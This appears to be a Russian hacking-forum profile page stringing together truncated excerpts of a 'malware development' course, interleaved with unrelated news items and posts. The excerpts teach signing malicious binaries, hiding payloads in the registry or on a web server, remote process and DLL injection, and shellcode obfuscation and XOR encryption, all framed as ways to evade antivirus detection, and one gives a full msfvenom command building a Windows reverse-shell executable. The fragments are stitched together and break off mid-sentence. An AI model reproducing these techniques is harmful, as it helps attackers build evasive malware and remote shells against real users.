X-Shar

Когда пользователь пытается загрузить исполняемый файл из интернета, он часто подписан компанией как способ доказать пользователю, что это надежный исполняемый файл.
Несмотря на то что системы безопасности все равно будут проверять исполняемый файл, на него была бы направлена дополнительная проверка, если бы бинарный файл не был подписан.

Предлагаю рассмотреть шаги, необходимые для подписания вредоносного бинарного файла, что может повысить его надежность.

В статье демонстрируется подписание бинарного файла на исполняемом файле, созданном через Msfvenom: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o mybin.exe

Тест, как подпись влияет на детект:

Перед началом бинарный файл был загружен на VirusTotal, чтобы увидеть степень обнаружения до подписания бинарного файла.
Степень обнаружения довольно высока: 52 из 71 антивирусов отметили файл как вредоносный...

В общем из предыдущих уроков мы с вами знаем, что payload не обязательно должен храниться внутри вредоносной программы.
Вместо этого payload может быть получен во время выполнения вредоносной программы. В этой статье будет показана похожая техника, только payload будет записан в качестве значения ключа реестра и извлечен из реестра при необходимости.
Так как payload будет храниться в реестре, при сканировании вредоносной программы системами безопасности они не смогут обнаружить или найти payload внутри.

Код в этой статье разделен на две части. Первая часть записывает зашифрованный payload в ключ реестра. Вторая часть считывает payload из того же ключа реестра, расшифровывает его и выполняет.
В статье не будет объясняться процесс шифрования/расшифрования, так как это было объяснено в предыдущих уроках.

Также мы будем использовать условную компиляцию

Условная Компиляция

Условная компиляция - это способ включать код в проект, который компилятор либо будет компилировать...

На протяжении всех статей до сих пор payload был постоянно хранящимся непосредственно внутри бинарного файла.

Это быстрый и часто используемый метод для извлечения payload. К сожалению, в некоторых случаях, когда существуют ограничения по размеру payload, сохранение payload внутри кода не является осуществимым подходом. Альтернативный подход заключается в размещении payload на веб-сервере и его извлечении во время выполнения.

Настройка Веб-сервера

Эта статья требует веб-сервера для размещения файла payload. Самый простой способ - использовать HTTP-сервер Python с помощью следующей команды:

Обратите внимание, что файл payload должен быть размещен в той же директории, где выполняется эта команда.

Чтобы проверить работу веб-сервера, перейдите по адресу с использованием браузера.

[ATTACH type="full"...

Эта статья похожа на предыдущую DLL Injection с небольшими изменениями.

Инъекция shellcode в процесс будет использовать практически те же самые API Windows.

VirtualAllocEx - выделение памяти.

WriteProcessMemory - запись полезной нагрузки в удаленный процесс.

VirtualProtectEx - изменение защиты памяти.

CreateRemoteThread - выполнение полезной нагрузки через новый поток.

Перечисление процессов

Как и в предыдущей статье, инъекция процесса начинается с перечисления процессов.

Фрагмент кода для перечисления процессов, показанный ниже, уже был объяснен в предыдущей статье.

В этой статье предлагаю обсудить метод, аналогичный тому, что был показан ранее при локальной инъекции DLL, за исключением того, что теперь инъекция будет выполняться в удаленный процесс.

Перечисление процессов

Прежде чем можно будет инъецировать DLL в процесс, необходимо выбрать целевой процесс. Поэтому первым шагом в инъекции в удаленный процесс обычно является перечисление запущенных процессов на компьютере для определения потенциальных целевых процессов, в которые можно выполнить инъекцию. Для этого требуется идентификатор процесса (PID), чтобы открыть дескриптор целевого процесса и выполнить необходимую работу в нем.

В статье мы создадим функцию, которая выполняет перечисление процессов для определения всех запущенных процессов.
Функция GetRemoteProcessHandle будет использоваться для перечисления всех запущенных процессов в системе, открытия дескриптора целевого процесса и возврата как PID, так и дескриптора процесса.

CreateToolhelp32Snapshot

Кодовый...

Предлагаю в этой статье исследовать использование динамических библиотек (DLL) в качестве полезной нагрузки и попробовать загрузить вредоносный файл DLL в текущем процессе.

Создание DLL

Создание DLL просто и может быть выполнено с помощью Visual Studio.
Создайте новый проект, выберите язык программирования C++, а затем выберите Динамически-связанную библиотеку (DLL).
Это создаст код-скелет DLL, который будет изменяться в этой статье.

Если вы хотите освежить свои знания о том, как работают DLL, то можете обратится к этой статье:Уроки - Разработка малвари - 5. Изучаем динамические библиотеки



В этой статье будет использовано диалоговое окно, которое появляется, когда DLL успешно загружена.

Создание диалогового окна можно легко сделать с помощью MessageBox из WinAPI.

Приведенный ниже фрагмент кода будет запускать...

В предыдущих статьях обсуждались вопросы размещения полезной нагрузки и её шифрование.

Но как уже было замечено этого не достаточно для сбития детекта, необходимо обойти ещё детект по поведению и эмуляцию кода.

С детектом по поведению немного сложнее, но детект по эмуляции кода можно обойти как вариант обфускацией этого самого кода.)

Предлагаю в этой статье рассмотреть обфускацию полезной нагрузки, далее уже всё зависит что делает ваша ПО, вообще изначально нужно проектировать софт так, что-бы у него не было подозрительного поведения.

В статье будут рассматриваться три способа обфускации...

Что-бы антивирусу или исследователю кода было хорошо, рекомендуется применять шифрование + несколько методов обфускации в комплексе.)

1)IPv4/IPv6Fuscation - это метод обфускации, при котором байты shellcode преобразуются в строки IPv4 или IPv6. Давайте рассмотрим несколько байтов из shellcode Msfvenom x64 calc и проанализируем, как их можно...

В предыдущей статье мы рассмотрели где хранить полезную нагрузку (Payload), но как было сказано в коментарии к статье, для обхода детекта нужно много чего сделать, в частности нужно зашифровать Payload и ещё позаботится об антиэмуляции и скрытия поведения.

В этой статье рассмотрим пока-что как шифровать.)

Шифрование с использованием XOR

Шифрование с использованием XOR является самым простым в использовании и легким в реализации, что делает его популярным выбором для вредоносных программ. Оно быстрее, чем AES и RC4, и не требует дополнительных библиотек или использования API Windows. Кроме того, это симметричный алгоритм шифрования, который позволяет использовать одну и ту же функцию как для шифрования, так и для дешифрования.

Шифрование XOR Приведенный ниже фрагмент кода показывает базовую функцию шифрования XOR...

В этой статье предлагаю поднять тему, куда и как класть нагрузку, он-же Payload.

Разработчик вредоносного ПО имеет несколько вариантов того, где в файле PE можно хранить полезную нагрузку. В зависимости от выбора полезная нагрузка будет находиться в разных разделах файла PE.

Полезные нагрузки могут храниться в одном из следующих разделов PE:

.data
.rdata
.text
.rsrc

Раздел .data

Раздел .data файла PE — это раздел исполняемого файла программы, который содержит инициализированные глобальные и статические переменные. Этот раздел доступен для чтения и записи, что делает его подходящим для зашифрованной полезной нагрузки, которая требует дешифровки во время выполнения.
Если полезная нагрузка является глобальной или локальной переменной, она будет сохранена в разделе .data в зависимости от настроек компилятора.

Приведенный ниже фрагмент кода показывает пример того, как полезная нагрузка хранится в разделе .data.

ИБ-эксперт обнаружил, что неназванный производитель мужских поясов верности раскрывает данные своих пользователей, включая email-адреса, пароли (открытым текстом) домашние адреса, IP-адреса, а в некоторых случаях даже координаты GPS.

Исследователь, пожелавший остаться анонимным, рассказал изданию , что ему удалось получить доступ к базе данных, содержащей записи более 10 000 пользователей. Доступ был получен благодаря двум уязвимостям, о которых специалист уведомил компанию еще 17 июня 2023 года.

Однако журналисты пишут, что производитель поясов верности до сих пор не исправил обнаруженные проблемы и не ответил ни на запросы TechCrunch, ни на сообщения ИБ-специалиста. Журналисты даже связались с хостером компании и тот заверил, что предупредит о проблемах производителя устройств, а также китайский CERT, чтобы те так...

Введение

Системы безопасности используют несколько техник для обнаружения вредоносного программного обеспечения.
Важно понимать, какие методы системы безопасности используют для классификации ПО как вредоносное.

Статическое по сигнатуре обнаружение

Сигнатура - это ряд байтов или строк внутри вредоносного ПО, которые уникально его идентифицируют. Могут указываться и другие условия, такие как имена переменных и импортируемые функции. Как только система безопасности сканирует программу, она пытается сопоставить ее со списком известных правил. Эти правила должны быть предварительно созданы и загружены в систему безопасности.
YARA - это один из инструментов, который используют производители безопасности для создания правил обнаружения. Например, если шелл-код содержит последовательность байтов, которая начинается с ЕС 48 83 Е4 ЕО E8 СО 00 00 00 41 51 41 50 52 51, это можно использовать для обнаружения того, что полезная нагрузка...

В предыдущих версиях статей, было очень краткое ознакомление каких-то базовых вещей, без которых вообще проблематично вести разработку.
Понятно что этого недостаточно, но какое-то направление может дать.

Думаю это последняя статья, по теории и следующие статьи будут уже предметные, посвященные конкретно малвари...

Что такое процесс Windows?

Процесс Windows - это программа или приложение, выполняющееся на машине с Windows. Процесс может быть запущен как пользователем, так и самой системой. Процесс потребляет ресурсы, такие как память, дисковое пространство и процессорное время, чтобы выполнить задачу.

Потоки процесса

Процессы Windows состоят из одного или нескольких потоков, которые выполняются одновременно. Поток — это набор инструкций, которые могут выполняться независимо в рамках процесса. Потоки внутри процесса могут обмениваться данными. Потоки планируются к выполнению операционной системой и...

Софтверная индустрия борется с бинарными уязвимостями различными техниками: тестированием, ревью, статическим и динамическим анализом, использованием безопасных подмножеств языка и другими. Но даже в продуктах от самых технологически продвинутых корпораций обнаруживаются все новые уязвимости.

Сергей Рогачев, руководитель отдела разработки безопасной платформы «Лаборатории Касперского», рассказывает о языках программирования, которые дают дополнительные инструменты для достижения безопасности, и о том, какие из них могут использоваться для написания операционных систем.

Смотрите на YouTube видео с Kaspersky Cyber Immunity Developers Night 2023


Вообще рекомендую посмотреть канал Kaspersky Cyber Immunity Developers Night 2023, там много всяких интересных докладов:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

В этой статье предлагаю рассмотреть создание динамических библиотек, в винде это всем наверное известные DLL.)

И .exe, и .dll файлы считаются исполняемыми файлами, в формате PE, сам PE уже описан много где, нет не времени не желание описывать архитектуру, если интересно всё в сети есть и очень разжованно.)

Что такое DLL?

DLL - это общие библиотеки исполняемых функций или данных, которые могут использоваться несколькими приложениями одновременно. Они используются для экспорта функций, которые будут использоваться процессом. В отличие от EXE файлов, DLL файлы не могут исполнять код самостоятельно. Вместо этого библиотеки DLL необходимо загрузить другими программами для выполнения кода.

Например функция createFile экспортирована из kernel32.dll, поэтому если процесс хочет вызвать эту функцию, ему сначала нужно загрузить kernel32.dll в свое адресное пространство.

Некоторые DLL автоматически загружаются в каждый...

В России наблюдается блокировка популярных VPN-протоколов OpenVPN и Wireguard.

К сожалению, мы не можем точно определить, является ли это временной или постоянной мерой.

В связи с этим, как альтернативное и надежное решение, мы настоятельно рекомендуем переустановить ваше VPN-решение на Amnezia и использовать протоколы OpenVPN over Cloak (рекомендуется) или Shadowsocks.

Также работает Outline VPN.

Будет-ли блокировка OpenVPN и Wireguard постоянной покажет время, пока-что многие испытывают проблемы.:(

Что-то не пойму гугл выдал:



Но в графе URL страниц с проблемами пусто и что делать ?)

Может если кто выкладывает ссылки с софтом прячте их в хайд ?

Или в запороленный архив, непонятно в общем.:(

Архитектура любой ОС, очень сложная система, так наскоком не изучишь.

Тут на форуме есть целый раздел:Системное программирование и разработка

Но т.к. разработка малвари - Это системная разработка, какое-то понимание этой самой архитектуры нужно иметь, поэтому данная шпаргалка даст небольшое понимание, но к сожалению не более того.:(

Процессор внутри компьютера, на которой работает операционная система Windows, может работать в двух разных режимах: режиме пользователя и режиме ядра.

Приложения работают в режиме пользователя, а компоненты операционной системы работают в режиме ядра.

Когда приложение хочет выполнить задачу, например, создать файл, оно не может сделать это самостоятельно.

Единственная сущность, которая может выполнить задачу - это ядро, поэтому приложения должны следовать определенному порядку вызова функций.
Ниже представлена диаграмма, показывающая высокий уровень этого потока...

Хе словил интересный вирус, который сейчас распространяется на всех торрентах, где можно типо скачать этот фильм, вот например ссылка:



Что тут у нас происходит, предлагают скачать файл, около 2 гигов:
Chalenge (Chalenge RUSS AUDIO 2023) russkie film (2023) FULL HD VIDEO 1080p Free torrent RU AUDIO full HD.mp4.scr

Всё круто, если бы не НО:

Как вы видите расширение файла mp4.scr.

Далее если вы запустите файлик, то вместо фильма, в папку темп дропнится такой файлик:tmpD763.tmp

Он-же на VT:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Он-же и в автозагрузку кстати, не поленится и добавится...)

Вот что ещё интересно, если посмотреть этот Chalenge (Chalenge RUSS AUDIO 2023) russkie film (2023) FULL HD VIDEO 1080p Free torrent RU AUDIO...

Вообще в сети много холиваров на это тему.

Многие представители старой школы отказываются признавать новые технологии и считают разработку малвари, как низкоуровневую разработку, т.е. что-то там на уровне драйверов системы, какое-то аппаратное взаимодействие низкоуровневое, например работа с процессором, реверс и т.д.

Да, всё это может присутствовать в разработке, но необходимо понимать, что малварь сейчас весьма обширное понятие.

Вот приведу пару примеров:

1)Нам нужно сделать ботнет, что мы будем использовать ?

Клиент - какой язык мы будем выбирать, уж точно не ассемблер, тут на самом деле выбор очень широк, даже тот-же C# подойдёт.
Серверная часть - Тут выбор ещё больше, всякие-там php, питонячие скрипты, а почему-бы и нет, вот даже на Си писать сервер сейчас может-быть затратно с нуля.

Кстати по поводу ботнета, в бытности мы как-то делали небольшой проект для конкурса XSS, вот интересные статьи рекомендую...

В предыдущей части мы затронули, зачем вообще разрабатывать вредоносное ПО, рассмотрели жизненный цикл такого ПО и немного затронули выбор языка разработки.

Предыдущая часть тут: Зачем изучать разработку вредоносных программ ?

Перед началом путешествия по разработке вредоносного программного обеспечения необходимо подготовить рабочее пространство, установив инструменты для разработки вредоносных программ, а также их отладки.

Эти инструменты будут полезны в процессе разработки и анализа вредоносного программного обеспечения.

Отмечу что пока мы будем рассматривать ОС Windows, т.к. большинство малвари пишут именно под эту ОС, но также в будущем хочу затронуть Линукс и может-быть несколько статей будут затрагивать обсуждение малвари для мобильных устройств.)

Инструменты разработки/отладки и исследования программ

Установите следующие инструменты:

Visual Studio - это среда...